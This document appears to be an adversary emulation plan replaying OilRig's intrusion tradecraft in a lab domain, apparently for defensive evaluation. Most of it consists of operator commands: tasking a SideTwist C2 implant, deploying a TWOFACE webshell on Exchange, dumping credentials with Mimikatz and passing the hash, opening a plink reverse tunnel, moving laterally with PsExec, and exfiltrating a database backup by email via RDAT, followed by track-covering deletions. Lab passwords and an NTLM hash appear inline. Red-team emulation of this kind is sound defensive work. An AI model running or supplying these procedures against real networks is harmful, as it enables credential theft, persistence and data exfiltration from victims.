# Scenario Overview

Legend of symbols:

  • 💡 - callout notes
  • - extremely important note
  • ➡️ - Switching to another session
  • - Sign out of something

This scenario emulates OilRig TTPs based on several malware specimens either used by or associated with the OilRig actors:

  1. SideTwist
  3. TwoFace
  4. RDAT

A Note on This Document:

This all-in-one file does not include steps related to noise, which was also conducted during the week. For the purpose of the plan, presume that an active user session for Gosta is present for any SideTwist steps, necessary for the scheduled task to execute the implant. This session originated from an out-of-scope jump box

# Step 0 - Setup

# 🎤 Voice Track

The C2 consists of an HTTP server that hosts a dummy a Flickr error page. Commands to the implant are embedded between <script> tags. The command itself consists of a base64-encoded blob which contains an encrypted string (using simple xor encryption). Requests to the page that do not correspond to a registered implant will simply return the dummy page.

The malicious document is delivered from a separate attacking machine running postfix.

# ☣️ Procedures

  • 💡 RDP, do not SSH, to the Linux Attack Platform hosting the C2 server.

  • Open a new terminal window and cd to the cloned repo control server:

cd /opt/oilrig/Resources/control_server
  • Ensure the SideTwist handler is enabled for the server:
tail -n 5 ./config/handler_config.yml


  port: 443
  enabled: true

💡 if the output contains enabled: false, change the value in handler_config.yml to match above.

  • Start the control server:
sudo ./controlServer
  • ➡️ SSH to the Mail and Apache Server to ensure the malicious document (Marketing_Materials.zip) is in /var/www/html.

  • Check the file exists:

ls /var/www/html

💡 If the armed and zipped file is not there, follow the instructions for creating it then copy the zip file to /var/www/html.

  • Restart the Apache and Postfix services to ensure they are fresh:
systemctl restart apache2
systemctl restart postfix

# Step 1 - Initial Compromise and Persistence

# 🎤 Voice Track

Step 1 emulates OilRig gaining initial access from user gosta downloading and opening a Microsoft Word document received from a link in a spearphishing email from team@ganjavigms.com. The malicious macro enabled in the document performs the following actions when the document is first opened:

  1. The computername and username environment variables are collected.
  2. A sandbox detection check is performed using Application.MouseAvailable.
  3. The SideTwist payload is embedded within the document under UserForm1.TextBox1.Text as base64-encoded data.
  4. Two artifacts b.doc (actually an executable) and update.xml are dropped into this directory. b.doc is the SideTwist payload and update.xml is an additional empty file that, if not present, SideTwist will terminate automatically.

When the document is closed:

  1. Another sandbox detection check is performed using Application.MouseAvailable.
  2. b.doc is renamed to SystemFailureReporter.exe.
  3. A scheduled task named SystemFailureReporter is created and runs SystemFailureReporter.exe every 5 minutes.

When SystemFailureReporter.exe runs:

  1. SystemFailureReporter.exe uses the GetUserName API, GetComputerName API, and GetDomainName API to find the current user, hostname, and domain respectively.
  2. SystemFailureReporter.exe connects to the control server ( over XOR encrypted protocol HTTP on port 443.

# ☣️ Procedures

➡️ RDP into THEBLOCK (

Username Password
BOOMBOX\gosta d0ntGoCH4$ingW8trfalls
Username Password
BOOMBOX\gosta d0ntGoCH4$ingW8trfalls

💡 There should be an unread email from team@ganjavigms.com.

  • Open this email and click the link to download the zipped file.

  • Open File Explorer and navigate to the Downloads file directory.

  • Unzip Marketing_Materials.zip and enter the password !M@rk3ting! when prompted

  • Double click the extracted word document GGMS Overview.doc, click "enable editing", and click "enable content".

Wait 30 seconds then close the document.

  • 🔍 The C2 server should register a new SideTwist callback after the document is closed.

# 🗿 Source Code

# 🔬 Cited Intelligence

# Step 2 - Workstation Discovery

# 🎤 Voice Track

Step 2 emulates OilRig performing a string of initial enumeration commands using the cmd spawned by SystemFailureReporter.exe.

OilRig enumerates the current user, system information, system network configuration information, domain users, domain groups, domain accounts, local groups, network connections, running processes, running services, and a registry key value to check if RDP is enabled.

At this point OilRig has discovered that the current user gosta is a member of EWS Admins, that EWS server WATERFALLS has the ip address of and is part of the Exchange Trusted Subsystem group, and the existence of several other administrator groups, including SQL Admins of which user tous is a member.

# ☣️ Procedures

➡️ On Linux Attack Platform as user saka, split the existing C2 terminal window horizontally, being careful to not terminate the server.

Right click > Split Horizontally

In the bottom split window, issue the following commands to the implant, waiting until each task is accomplished before teeing the next one.

💡 The implant will execute every 5 minutes.

# Helminth has been observed to perform initial information gathering on systems, including the enumeration of the current user, accounts, groups, system information, network connections, processes, services, and if remote desktop is enabled.

./evalsC2client.py --set-task goTb '101 whoami & hostname & ipconfig /all & net user /domain 2>&1 & net group /domain 2>&1 & net group "domain admins" /domain 2>&1 & net group "Exchange Trusted Subsystem" /domain 2>&1 & net accounts /domain 2>&1 & net user 2>&1 & net localgroup administrators 2>&1 & netstat -an 2>&1 & tasklist 2>&1 & sc query 2>&1 & systeminfo 2>&1 & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1'

Perform follow up discovery using gained information to determine gosta is a member of EWS Administrators, tous is a SQL administrator and the IP of WATERFALLS.

# OilRig has been observed to perform enumeration of users and groups.[3]

./evalsC2client.py --set-task goTb '101 net user gosta /domain 2>&1 & net group "SQL Admins" /domain 2>&1 & nslookup WATERFALLS 2>&1'

# 🗿 Source Code

# 🔬 Cited Intelligence

# Step 3 - Workstation Low Privilege Credential Dumping

# 🎤 Voice Track

Step 3 emulates OilRig using SystemFailureReporter.exe to download VALUEVAULT (the executable for which is b.exe) which is then leveraged to perform a low privilege credential dumping. SystemFailureReporter.exe then uploads the VALUEVAULT dump (named fsociety.dat) back to C2 via HTTP POST request.

The output of the credential dump provides a plaintext password for the current user gosta.

# ☣️ Procedures

➡️ On Linux Attack Platform as saka, issue the command to download VALUEVAULT to the workstation

./evalsC2client.py --set-task goTb '102 C:\Users\gosta\AppData\Roaming\b.exe|b.exe'

Issue the command to execute VALUEVAULT after it has been downloaded:

./evalsC2client.py --set-task goTb '101 C:\Users\gosta\AppData\Roaming\b.exe'

Issue the command to upload output of VALUEVAULT to C2 after it has executed:

./evalsC2client.py --set-task goTb '103 C:\Users\gosta\AppData\Roaming\fsociety.dat'

Confirm that the credentials were obtained on C2 server.

ls ./files
cat ./files/fsociety.dat

# 🗿 Source Code

# 🔬 Cited Intelligence

# Step 4 - Install Web Shell on EWS

# 🎤 Voice Track

Step 4 emulates OilRig installing web shell persistence on WATERFALLS ( This is accomplished by downloading the TWOFACE webshell (named contact.aspx) via SystemFailureReporter.exe; TWOFACE is then copied from THEBLOCK to WATERFALLS and hidden with attrib + h.

OilRig covers their tracks by deleting the webshell from gosta's user directory on THEBLOCK.

# ☣️ Procedures

The webshell is first placed on THEBLOCK ( to prepare for copying via SMB to WATERFALLS.

./evalsC2client.py --set-task goTb '102 C:\Users\Public\contact.aspx|contact.aspx'

Once in place, OilRig has copied the webshell directly into the Exchange Web Services directory.

./evalsC2client.py --set-task goTb '101 copy C:\Users\Public\contact.aspx "\\\C$\Program Files\Microsoft\Exchange Server\V15\ClientAccess\exchweb\ews\"'

Set the file hidden attribute on WATERFALLS and delete the webshell from THEBLOCK using SideTwist

./evalsC2client.py --set-task goTb '101 attrib +h "\\\C$\Program Files\Microsoft\Exchange Server\V15\ClientAccess\exchweb\ews\contact.aspx" & del C:\Users\Public\contact.aspx'

# 🗿 Source Code

# 🔬 Cited Intelligence

# Step 5 - EWS Discovery

# 🎤 Voice Track

Step 5 emulates OilRig using the TWOFACE webshell to perform enumeration on the EWS WATERFALLS ( to discover the SQL server ENDOFROAD (

OilRig first uses the webshell to perform some initial discovery once on the host by enumerating the current user, system network configuration and system network connections.

Output of the system network connections discovery indicates an open connection to via a port commonly associated with SQL.

# ☣️ Procedures

On Linux Attack Platform box, change directories to the TwoFace payload folder:

cd /opt/oilrig/Resources/payloads/TwoFace

Use the webshell to enumerate the current user.

# OilRig has run whoami on a victim.[3][4][10]

curl --http1.1 --ntlm -u 'boombox\gosta:d0ntGoCH4$ingW8trfalls' -k -X POST --data "pro=cmd.exe" --data "cmd=whoami"

Enumerate the system network configurations.

# OilRig has run ipconfig /all on a victim.[3][4]

curl --http1.1 --ntlm -u 'boombox\gosta:d0ntGoCH4$ingW8trfalls' -k -X POST --data "pro=cmd.exe" --data "cmd=ipconfig /all"

Use the webshell to perform network discovery on WATERFALLS (, discovering a connection to host via a port commonly associated with SQL.

# OilRig has used netstat -an on a victim to get a listing of network connections.[3]

curl --http1.1 --ntlm -u 'boombox\gosta:d0ntGoCH4$ingW8trfalls' -k -X POST --data "pro=cmd.exe" --data "cmd=netstat -an"

# 🗿 Source Code

# 🔬 Cited Intelligence

# Step 6 - Privileged Credential Dumping

# 🎤 Voice Track

Step 6 emulates OilRig using the webshell to download Mimikatz to WATERFALLS and using elevated privileges to dump credentials. The dumped credentials (stored in 01.txt) are exfiltrated back to the C2 ( via the webshell.

After exfiltration is complete OilRig deletes both Mimikatz and the dumped credentials from the directory on WATERFALLS.

# ☣️ Procedures

Download Mimikatz to WATERFALLS (

curl --http1.1 --ntlm -u 'boombox\gosta:d0ntGoCH4$ingW8trfalls' -k -X POST -F "upl=f1" -F 'sav=C:\Windows\temp\' -F "vir=false" -F "nen=m64.exe" -F 'f1=@m64.exe'

Dump credentials using Mimikatz. Output includes creds for SQL server administrator tous.

💡 privilege::debug has been included here to match the CTI, but is unnecessary due to the webshell running as SYSTEM.

curl --http1.1 --ntlm -u 'boombox\gosta:d0ntGoCH4$ingW8trfalls' -k -X POST --data "pro=cmd.exe" --data "cmd=C:\Windows\Temp\m64.exe privilege::debug sekurlsa::logonPasswords exit 1> C:\Windows\Temp\01.txt"

Exfiltrate the resulting output file 01.txt to the attacker platform.

curl --http1.1 --ntlm -u 'boombox\gosta:d0ntGoCH4$ingW8trfalls' -k -X POST -o 01.txt --data 'don=c:\windows\temp\01.txt'

Display the contents of 01.txt in the terminal window.

cat 01.txt

Clean up on WATERFALLS by removing the binary and output file from C:\Windows\Temp\.

curl --http1.1 --ntlm -u 'boombox\gosta:d0ntGoCH4$ingW8trfalls' -k -X POST --data "pro=cmd.exe" --data "cmd=del C:\windows\temp\01.txt C:\windows\temp\m64.exe"

# 🗿 Source Code

NB: The function descriptions in TwoFace (contact.aspx) refer to the Mimikatz download as "Arbitrary Folder Upload" and the 01.txt exfiltration as "File Download" which is the reverse of how said activities are described in the emulation procedure; this is to match to CTI but results in slightly contradictory source code links.

# 🔬 Cited Intelligence

# Step 7 - Lateral Movement to EWS via RDP Tunnel

# 🎤 Voice Track

Step 7 emulates OilRig moving laterally to WATERFALLS ( This is accomplished with a remote port forward using the plink command line tool (downloaded by SystemFailureReporter.exe). OilRig conducts a remote port forward from THEBLOCK ( to the attacking machine to allow RDP access through port 3389 as user gosta.

# ☣️ Procedures

Download plink to THEBLOCK ( using SideTwist and start plink tunnel to gain RDP access to WATERFALLS ( from the Linux Attack Platform.

./evalsC2client.py --set-task goTb '102 c:\users\public\downloads\plink.exe|plink.exe'

Execute the remote port forward command using SideTwist. Note: this SideTwist process will persist as long as the tunnel is open and as such will need to be closed after the activity is done. SideTwist will continue to execute via schtask so other commands can be issued to the implant if needed.

./evalsC2client.py --set-task goTb '101 echo y | c:\users\public\downloads\plink.exe -ssh -N -R -l saka -pw "$ceKa#zU$Uc4^9yZ"'

Ensure that the tunnel is open and listening on port 13389 on Linux Attack Platform.

netstat -antulp | grep 13389

You should see a result that looks like the following:

tcp        0      0*               LISTEN

RDP to WATERFALLS ( as user Gosta from Linux Attack Platform using the SSH tunnel.

xfreerdp /u:'boombox\gosta' /p:'d0ntGoCH4$ingW8trfalls' /v:localhost:13389

# 🗿 Source Code

  • Plink command line tool: Plink

# 🔬 Cited Intelligence

# Step 8 - Lateral Movement to the SQL Server

# 🎤 Voice Track

Step 8 emulates OilRig using the credentials collected for the user tous in the previous step to move laterally to the SQL server.

First, the webshell is used to download PsExec, RDAT, and a newly named Mimikatz to disk. Through the tunneled RDP, an elevated Command Prompt is opened and, using the NTLM hash for tous from the credential dump, Mimikatz pass the hash is executed to spawn a second shell as tous on WATERFALLS ( As tous, RDAT is copied over to ENDOFROAD (, then PsExec is executed to get a shell on ENDOFROAD (

# ☣️ Procedures

Download psexec to WATERFALLS ( as C:\Windows\System32\ps.exe

# OilRig has downloaded PsExec as ps.exe

curl --http1.1 --ntlm -u 'boombox\gosta:d0ntGoCH4$ingW8trfalls' -k -X POST -F "upl=f1" -F 'sav=C:\Windows\System32' -F "vir=false" -F "nen=ps.exe" -F 'f1=@PsExec.exe'

Download RDAT to WATERFALLS ( as Nt.dat

# OilRig has saved RDAT to disk as Nt.dat

curl --http1.1 --ntlm -u 'boombox\gosta:d0ntGoCH4$ingW8trfalls' -k -X POST -F "upl=f1" -F 'sav=C:\Windows\Temp' -F "vir=false" -F "nen=Nt.dat" -F 'f1=@RDAT.exe'

Redownload Mimikatz to WATERFALLS ( as mom64.exe

# OilRig has saved Mimikatz to disk at mom64.exe

curl --http1.1 --ntlm -u 'boombox\gosta:d0ntGoCH4$ingW8trfalls' -k -X POST -F "upl=f1" -F 'sav=C:\Windows\System32' -F "vir=false" -F "nen=mom64.exe" -F 'f1=@m64.exe'

In the RDP to WATERFALLS (, open a new Command Prompt as Administrator, click yes to the UAC prompt, and execute Mimikatz PTH for tous

# OilRig has used Mimikatz

C:\Windows\System32\mom64.exe "privilege::debug" "sekurlsa::pth /user:tous /domain:BOOMBOX /ntlm:9b7ff4cc0878bee9f099a4a7dc7227c3" "exit"

In the new Command Prompt spawned by the Mimikatz pass the hash, copy RDAT to ENDOFROAD (

# OilRig has saved RDAT to disk as C:\Programdata\Nt.dat before moving and renaming it to C:\Programdata\Vmware\VMware.exe

copy C:\Windows\Temp\Nt.dat \\\C$\ProgramData\

In the new Command Prompt spawned by Mimikatz pass the hash, PsExec to the SQL server ENDOFROAD (

# OilRig has used PsExec [11]

C:\Windows\System32\ps.exe \\ cmd.exe

# 🗿 Source Code

NB: Once again, TwoFace (contact.aspx) refers to the "downloads" from this section of the emulation procedure as "Abritrary Folder Upload(s)" in the source code.

  • RDAT backdoor: RDAT

# 🔬 Cited Intelligence

# Step 9 - SQL Server Discovery

# 🎤 Voice Track

Step 9 emulates OilRig using the command prompt (in the context of tous) created by Mimikatz pass the hash and PSExec to perform discovery of the database backup files on the SQL server ENDOFROAD (

# ☣️ Procedures

Discover version of SQL server

dir "C:\Program Files\Microsoft SQL Server\"

Discover SQL server database backup files

dir "C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Backup\"

# 🔬 Cited Intelligence

# Step 10 - Collection and Exfiltration of Database Files

# 🎤 Voice Track

Step 10 emulates OilRig collecting and exfiltrating backups of the database files via the EWS API.

OilRig first creates a new directory C:\Programdata\Vmware in which to stage the collected data. RDAT is then moved to the new directory and renamed to VMware.exe.

The newly named VMware.exe is used to read the data from sitedata_db.bak, split the data into 20000 byte chunks, and exfiltrate the chunks via EWS API to an attacker controlled email (sistan@shirinfarhad.com). The stolen data is obfuscated within BMP images attached to the emails sent to sistan@shirinfarhad.com.

# ☣️ Procedures

Create directory C:\Programdata\Vmware

# OilRig has saved RDAT to disk as C:\Programdata\Nt.dat before moving and renaming it to C:\Programdata\Vmware\VMware.exe

mkdir C:\Programdata\Vmware

Move and rename RDAT as C:\Programdata\Vmware\VMware.exe

# OilRig has saved RDAT to disk as C:\Programdata\Nt.dat before moving and renaming it to C:\Programdata\Vmware\VMware.exe

move C:\Programdata\Nt.dat C:\Programdata\Vmware\VMware.exe

Change directory into the SQL backup directory (PsExec has a character limit)

cd "C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Backup\"

Execute RDAT to pull back target database backup file.

# OilRig has used EWS APIs to exfiltrate data to an adversary controlled email

C:\ProgramData\Vmware\VMware.exe --path="sitedata_db.bak" --to="sistan@shirinfarhad.com" --from="gosta@boom.box" --server="" --password='d0ntGoCH4$ingW8trfalls' --chunksize="200000"

# 🗿 Source Code

# 🔬 Cited Intelligence

# Step 11 - Cleanup

# 🎤 Voice Track

Step 11 emulates OilRig's cleanup and egress from the target network.

# ☣️ Procedures

From within your PsExec session from WATERFALLS to ENDOFROAD:

Delete RDAT:

del C:\ProgramData\VMware\VMware.exe

Delete the parent directory:

rmdir C:\ProgramData\VMware

Terminate the PsExec session to ENDOFROAD:


Terminate the command prompt spawned by Mimikatz running as Tous


From your elevated command prompt on WATERFALLS (via RDP):

Delete Mimikatz, RDAT, and PsExec from disk.

del C:\Windows\System32\mom64.exe C:\Windows\temp\Nt.dat C:\Windows\System32\ps.exe 

From Kali:

Find the PID of the SSH tunnel and terminate it.

ps aux | grep ssh
kill <PID>

From your C2 callback into THEBLOCK:

Instruct the SideTwist agent to delete VALUEVAULT, the VALUEVAULT output, plink.exe, and the SideTwist killswitch file.

./evalsC2client.py --set-task goTb '101 del C:\Users\gosta\AppData\Roaming\b.exe C:\Users\gosta\AppData\Roaming\fsociety.dat C:\Users\Public\Downloads\plink.exe C:\Users\gosta\AppData\Local\SystemFailureReporter\update.xml'

🔴 End of Scenario. Note: SideTwist will continue to execute but will not beacon without the update.xml file